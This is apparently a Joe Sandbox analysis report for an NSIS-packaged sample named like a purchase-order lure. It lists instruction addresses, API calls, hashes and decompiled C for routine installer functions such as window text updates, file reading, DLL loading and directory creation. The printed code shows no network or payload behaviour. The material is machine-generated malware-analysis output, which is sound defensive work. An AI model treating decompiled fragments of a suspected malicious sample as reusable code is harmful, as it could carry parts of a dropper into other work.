                                                                                      0x004017f5
                                                                                      0x004017f8
                                                                                      0x004017f8
                                                                                      0x004017ff
                                                                                      0x0040180e
                                                                                      0x00401813
                                                                                      0x00401816
                                                                                      0x00401819
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040181b
                                                                                      0x0040181e
                                                                                      0x00401874
                                                                                      0x00401879
                                                                                      0x004015b6
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x00402c2a
                                                                                      0x00402c2d
                                                                                      0x00402c2d
                                                                                      0x00000000
                                                                                      0x00401820
                                                                                      0x00401826
                                                                                      0x0040182d
                                                                                      0x0040183a
                                                                                      0x00401845
                                                                                      0x0040185b
                                                                                      0x0040185b
                                                                                      0x0040185e
                                                                                      0x00000000
                                                                                      0x00401864
                                                                                      0x00401864
                                                                                      0x00401865
                                                                                      0x00401882
                                                                                      0x00402c33
                                                                                      0x00402c33
                                                                                      0x00402c33
                                                                                      0x00401867
                                                                                      0x00401867
                                                                                      0x00401868
                                                                                      0x00401493
                                                                                      0x0040239d
                                                                                      0x0040239d
                                                                                      0x0040239d
                                                                                      0x00401865
                                                                                      0x0040185e
                                                                                      0x00402c35
                                                                                      0x00402c39
                                                                                      0x00402c39
                                                                                      0x00401892
                                                                                      0x00401897
                                                                                      0x004018a5
                                                                                      0x004018aa
                                                                                      0x004018b0
                                                                                      0x004018b4
                                                                                      0x004018b6
                                                                                      0x004018be
                                                                                      0x004018ca
                                                                                      0x004018b8
                                                                                      0x004018b8
                                                                                      0x004018bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004018bc
                                                                                      0x004018d3
                                                                                      0x004018d9
                                                                                      0x004018db
                                                                                      0x00000000
                                                                                      0x004018e1
                                                                                      0x004018e1
                                                                                      0x004018e4
                                                                                      0x004018fc
                                                                                      0x004018e6
                                                                                      0x004018e9
                                                                                      0x004018f2
                                                                                      0x004018f2
                                                                                      0x00401901
                                                                                      0x00401906
                                                                                      0x00402398
                                                                                      0x00000000
                                                                                      0x00402398
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                        • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsdFF63.tmp$C:\Users\user\AppData\Local\Temp\nsdFF63.tmp\System.dll$Call
                                                                                      • API String ID: 1941528284-2203829412
                                                                                      • Opcode ID: 9e4c6fc02f2735517d3760028c1d27d68b0a7a64359a36d7c4e7c39eda4ba6af
                                                                                      • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                      • Opcode Fuzzy Hash: 9e4c6fc02f2735517d3760028c1d27d68b0a7a64359a36d7c4e7c39eda4ba6af
                                                                                      • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 799 4056ca-4056df 800 4056e5-4056f6 799->800 801 405796-40579a 799->801 802 405701-40570d lstrlenW 800->802 803 4056f8-4056fc call 4066a5 800->803 805 40572a-40572e 802->805 806 40570f-40571f lstrlenW 802->806 803->802 808 405730-405737 SetWindowTextW 805->808 809 40573d-405741 805->809 806->801 807 405721-405725 lstrcatW 806->807 807->805 808->809 810 405743-405785 SendMessageW * 3 809->810 811 405787-405789 809->811 810->811 811->801 812 40578b-40578e 811->812 812->801
                                                                                      C-Code - Quality: 100%
                                                                                      			E004056CA(signed int _a4, WCHAR* _a8) {
                                                                                      				struct HWND__* _v8;
                                                                                      				signed int _v12;
                                                                                      				WCHAR* _v32;
                                                                                      				long _v44;
                                                                                      				int _v48;
                                                                                      				void* _v52;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				WCHAR* _t27;
                                                                                      				signed int _t28;
                                                                                      				long _t29;
                                                                                      				signed int _t37;
                                                                                      				signed int _t38;
                                                                                      
                                                                                      				_t27 =  *0x429244;
                                                                                      				_v8 = _t27;
                                                                                      				if(_t27 != 0) {
                                                                                      					_t37 =  *0x42a314;
                                                                                      					_v12 = _t37;
                                                                                      					_t38 = _t37 & 0x00000001;
                                                                                      					if(_t38 == 0) {
                                                                                      						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                                                      					}
                                                                                      					_t27 = lstrlenW(0x422728);
                                                                                      					_a4 = _t27;
                                                                                      					if(_a8 == 0) {
                                                                                      						L6:
                                                                                      						if((_v12 & 0x00000004) == 0) {
                                                                                      							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
                                                                                      						}
                                                                                      						if((_v12 & 0x00000002) == 0) {
                                                                                      							_v32 = 0x422728;
                                                                                      							_v52 = 1;
                                                                                      							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                      							_v44 = 0;
                                                                                      							_v48 = _t29 - _t38;
                                                                                      							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                      							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                      						}
                                                                                      						if(_t38 != 0) {
                                                                                      							_t28 = _a4;
                                                                                      							0x422728[_t28] = 0;
                                                                                      							return _t28;
                                                                                      						}
                                                                                      					} else {
                                                                                      						_t27 = lstrlenW(_a8) + _a4;
                                                                                      						if(_t27 < 0x1000) {
                                                                                      							_t27 = lstrcatW(0x422728, _a8);
                                                                                      							goto L6;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return _t27;
                                                                                      			}

















                                                                                      0x004056d0
                                                                                      0x004056da
                                                                                      0x004056df
                                                                                      0x004056e5
                                                                                      0x004056f0
                                                                                      0x004056f3
                                                                                      0x004056f6
                                                                                      0x004056fc
                                                                                      0x004056fc
                                                                                      0x00405702
                                                                                      0x0040570a
                                                                                      0x0040570d
                                                                                      0x0040572a
                                                                                      0x0040572e
                                                                                      0x00405737
                                                                                      0x00405737
                                                                                      0x00405741
                                                                                      0x0040574a
                                                                                      0x00405756
                                                                                      0x0040575d
                                                                                      0x00405761
                                                                                      0x00405764
                                                                                      0x00405777
                                                                                      0x00405785
                                                                                      0x00405785
                                                                                      0x00405789
                                                                                      0x0040578b
                                                                                      0x0040578e
                                                                                      0x00000000
                                                                                      0x0040578e
                                                                                      0x0040570f
                                                                                      0x00405717
                                                                                      0x0040571f
                                                                                      0x00405725
                                                                                      0x00000000
                                                                                      0x00405725
                                                                                      0x0040571f
                                                                                      0x0040570d
                                                                                      0x0040579a

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                      • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                      • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                      • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                        • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                        • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                      • String ID: ('B
                                                                                      • API String ID: 1495540970-2332581011
                                                                                      • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                      • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                      • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                      • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 813 4026ec-402705 call 402d84 816 402c2a-402c2d 813->816 817 40270b-402712 813->817 820 402c33-402c39 816->820 818 402714 817->818 819 402717-40271a 817->819 818->819 821 402720-40272f call 4065c8 819->821 822 40287e-402886 819->822 821->822 826 402735 821->826 822->816 827 40273b-40273f 826->827 828 4027d4-4027d7 827->828 829 402745-402760 ReadFile 827->829 831 4027d9-4027dc 828->831 832 4027ef-4027ff call 4061db 828->832 829->822 830 402766-40276b 829->830 830->822 833 402771-40277f 830->833 831->832 834 4027de-4027e9 call 406239 831->834 832->822 840 402801 832->840 836 402785-402797 MultiByteToWideChar 833->836 837 40283a-402846 call 4065af 833->837 834->822 834->832 836->840 841 402799-40279c 836->841 837->820 844 402804-402807 840->844 845 40279e-4027a9 841->845 844->837 847 402809-40280e 844->847 845->844 848 4027ab-4027d0 SetFilePointer MultiByteToWideChar 845->848 849 402810-402815 847->849 850 40284b-40284f 847->850 848->845 851 4027d2 848->851 849->850 852 402817-40282a 849->852 853 402851-402855 850->853 854 40286c-402878 SetFilePointer 850->854 851->840 852->822 855 40282c-402832 852->855 856 402857-40285b 853->856 857 40285d-40286a 853->857 854->822 855->827 858 402838 855->858 856->854 856->857 857->822 858->822
                                                                                      C-Code - Quality: 87%
                                                                                      			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                      				intOrPtr _t65;
                                                                                      				intOrPtr _t66;
                                                                                      				intOrPtr _t72;
                                                                                      				void* _t76;
                                                                                      				void* _t79;
                                                                                      
                                                                                      				_t72 = __edx;
                                                                                      				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                      				_t65 = 2;
                                                                                      				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                      				_t66 = E00402D84(_t65);
                                                                                      				_t79 = _t66 - 1;
                                                                                      				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                      				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                      				if(_t79 < 0) {
                                                                                      					L36:
                                                                                      					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                                                      				} else {
                                                                                      					__ecx = 0x3ff;
                                                                                      					if(__eax > 0x3ff) {
                                                                                      						 *(__ebp - 0x44) = 0x3ff;
                                                                                      					}
                                                                                      					if( *__edi == __bx) {
                                                                                      						L34:
                                                                                      						__ecx =  *(__ebp - 0xc);
                                                                                      						__eax =  *(__ebp - 8);
                                                                                      						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                      						if(_t79 == 0) {
                                                                                      							 *(_t76 - 4) = 1;
                                                                                      						}
                                                                                      						goto L36;
                                                                                      					} else {
                                                                                      						 *(__ebp - 0x38) = __ebx;
                                                                                      						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                                                      						if( *(__ebp - 0x44) > __ebx) {
                                                                                      							do {
                                                                                      								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                      									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                      										__eax = __ebp - 0x50;
                                                                                      										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                      											goto L34;
                                                                                      										} else {
                                                                                      											goto L21;
                                                                                      										}
                                                                                      									} else {
                                                                                      										goto L34;
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eax = __ebp - 0x40;
                                                                                      									_push(__ebx);
                                                                                      									_push(__ebp - 0x40);
                                                                                      									__eax = 2;
                                                                                      									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                      									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
                                                                                      									if(__eax == 0) {
                                                                                      										goto L34;
                                                                                      									} else {
                                                                                      										__ecx =  *(__ebp - 0x40);
                                                                                      										if(__ecx == __ebx) {
                                                                                      											goto L34;
                                                                                      										} else {
                                                                                      											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                      											 *(__ebp - 0x4c) = __ecx;
                                                                                      											 *(__ebp - 0x50) = __eax;
                                                                                      											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                      												L28:
                                                                                      												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                      											} else {
                                                                                      												__ebp - 0x50 = __ebp + 0xa;
                                                                                      												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                      													L21:
                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                      												} else {
                                                                                      													__edi =  *(__ebp - 0x4c);
                                                                                      													__edi =  ~( *(__ebp - 0x4c));
                                                                                      													while(1) {
                                                                                      														_t22 = __ebp - 0x40;
                                                                                      														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                      														__eax = 0xfffd;
                                                                                      														 *(__ebp - 0x50) = 0xfffd;
                                                                                      														if( *_t22 == 0) {
                                                                                      															goto L22;
                                                                                      														}
                                                                                      														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                      														__edi = __edi + 1;
                                                                                      														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
                                                                                      														__ebp - 0x50 = __ebp + 0xa;
                                                                                      														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                      															continue;
                                                                                      														} else {
                                                                                      															goto L21;
                                                                                      														}
                                                                                      														goto L22;
                                                                                      													}
                                                                                      												}
                                                                                      												L22:
                                                                                      												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                      													goto L28;
                                                                                      												} else {
                                                                                      													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                      														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                      															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                      															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1); // executed
                                                                                      														} else {
                                                                                      															__ecx =  *(__ebp - 0xc);
                                                                                      															__edx =  *(__ebp - 8);
                                                                                      															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                      															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                      														}
                                                                                      														goto L34;
                                                                                      													} else {
                                                                                      														__ecx =  *(__ebp - 0xc);
                                                                                      														__edx =  *(__ebp - 8);
                                                                                      														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                      														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                      														 *(__ebp - 0x38) = __eax;
                                                                                      														if(__ax == __bx) {
                                                                                      															goto L34;
                                                                                      														} else {
                                                                                      															goto L26;
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								goto L37;
                                                                                      								L26:
                                                                                      								__eax =  *(__ebp - 8);
                                                                                      							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                      						}
                                                                                      						goto L34;
                                                                                      					}
                                                                                      				}
                                                                                      				L37:
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x004026ec
                                                                                      0x004026ee
                                                                                      0x004026f1
                                                                                      0x004026f3
                                                                                      0x004026f6
                                                                                      0x004026fb
                                                                                      0x004026ff
                                                                                      0x00402702
                                                                                      0x00402705
                                                                                      0x00402c2a
                                                                                      0x00402c2d
                                                                                      0x0040270b
                                                                                      0x0040270b
                                                                                      0x00402712
                                                                                      0x00402714
                                                                                      0x00402714
                                                                                      0x0040271a
                                                                                      0x0040287e
                                                                                      0x0040287e
                                                                                      0x00402881
                                                                                      0x00402886
                                                                                      0x004015b6
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x00000000
                                                                                      0x00402720
                                                                                      0x00402721
                                                                                      0x0040272c
                                                                                      0x0040272f
                                                                                      0x0040273b
                                                                                      0x0040273f
                                                                                      0x004027d7
                                                                                      0x004027ef
                                                                                      0x004027ff
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00402745
                                                                                      0x00402745
                                                                                      0x00402748
                                                                                      0x00402749
                                                                                      0x0040274c
                                                                                      0x00402751
                                                                                      0x00402758
                                                                                      0x00402760
                                                                                      0x00000000
                                                                                      0x00402766
                                                                                      0x00402766
                                                                                      0x0040276b
                                                                                      0x00000000
                                                                                      0x00402771
                                                                                      0x00402771
                                                                                      0x00402779
                                                                                      0x0040277c
                                                                                      0x0040277f
                                                                                      0x0040283a
                                                                                      0x00402841
                                                                                      0x00402785
                                                                                      0x0040278b
                                                                                      0x00402797
                                                                                      0x00402801
                                                                                      0x00402801
                                                                                      0x00402799
                                                                                      0x00402799
                                                                                      0x0040279c
                                                                                      0x0040279e
                                                                                      0x0040279e
                                                                                      0x0040279e
                                                                                      0x004027a1
                                                                                      0x004027a6
                                                                                      0x004027a9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004027ab
                                                                                      0x004027ae
                                                                                      0x004027b6
                                                                                      0x004027c2
                                                                                      0x004027d0
                                                                                      0x00000000
                                                                                      0x004027d2
                                                                                      0x00000000
                                                                                      0x004027d2
                                                                                      0x00000000
                                                                                      0x004027d0
                                                                                      0x0040279e
                                                                                      0x00402804
                                                                                      0x00402807
                                                                                      0x00000000
                                                                                      0x00402809
                                                                                      0x0040280e
                                                                                      0x0040284f
                                                                                      0x00402871
                                                                                      0x00402878
                                                                                      0x0040285d
                                                                                      0x0040285d
                                                                                      0x00402860
                                                                                      0x00402863
                                                                                      0x00402866
                                                                                      0x00402866
                                                                                      0x00000000
                                                                                      0x00402817
                                                                                      0x00402817
                                                                                      0x0040281a
                                                                                      0x0040281d
                                                                                      0x00402823
                                                                                      0x00402827
                                                                                      0x0040282a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040282a
                                                                                      0x0040280e
                                                                                      0x00402807
                                                                                      0x0040277f
                                                                                      0x0040276b
                                                                                      0x00402760
                                                                                      0x00000000
                                                                                      0x0040282c
                                                                                      0x0040282c
                                                                                      0x0040282f
                                                                                      0x00402838
                                                                                      0x00000000
                                                                                      0x0040272f
                                                                                      0x0040271a
                                                                                      0x00402c33
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                        • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                      • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                      • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                      • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 859 4069c5-4069e5 GetSystemDirectoryW 860 4069e7 859->860 861 4069e9-4069eb 859->861 860->861 862 4069fc-4069fe 861->862 863 4069ed-4069f6 861->863 865 4069ff-406a32 wsprintfW LoadLibraryExW 862->865 863->862 864 4069f8-4069fa 863->864 864->865
                                                                                      C-Code - Quality: 100%
                                                                                      			E004069C5(intOrPtr _a4) {
                                                                                      				short _v576;
                                                                                      				signed int _t13;
                                                                                      				struct HINSTANCE__* _t17;
                                                                                      				signed int _t19;
                                                                                      				void* _t24;
                                                                                      
                                                                                      				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                                      				if(_t13 > 0x104) {
                                                                                      					_t13 = 0;
                                                                                      				}
                                                                                      				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                                      					_t19 = 1;
                                                                                      				} else {
                                                                                      					_t19 = 0;
                                                                                      				}
                                                                                      				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                                      				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                                      				return _t17;
                                                                                      			}








                                                                                      0x004069dc
                                                                                      0x004069e5
                                                                                      0x004069e7
                                                                                      0x004069e7
                                                                                      0x004069eb
                                                                                      0x004069fe
                                                                                      0x004069f8
                                                                                      0x004069f8
                                                                                      0x004069f8
                                                                                      0x00406a17
                                                                                      0x00406a2b
                                                                                      0x00406a32

                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                      • wsprintfW.USER32 ref: 00406A17
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                      • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                      • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                      • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 866 405b99-405be4 CreateDirectoryW 867 405be6-405be8 866->867 868 405bea-405bf7 GetLastError 866->868 869 405c11-405c13 867->869 868->869 870 405bf9-405c0d SetFileSecurityW 868->870 870->867 871 405c0f GetLastError 870->871 871->869
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405B99(WCHAR* _a4) {
                                                                                      				struct _SECURITY_ATTRIBUTES _v16;
                                                                                      				struct _SECURITY_DESCRIPTOR _v36;
                                                                                      				int _t22;
                                                                                      				long _t23;
                                                                                      
                                                                                      				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                      				_v36.Owner = 0x4083f8;
                                                                                      				_v36.Group = 0x4083f8;
                                                                                      				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                      				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                      				_v16.lpSecurityDescriptor =  &_v36;
                                                                                      				_v36.Revision = 1;
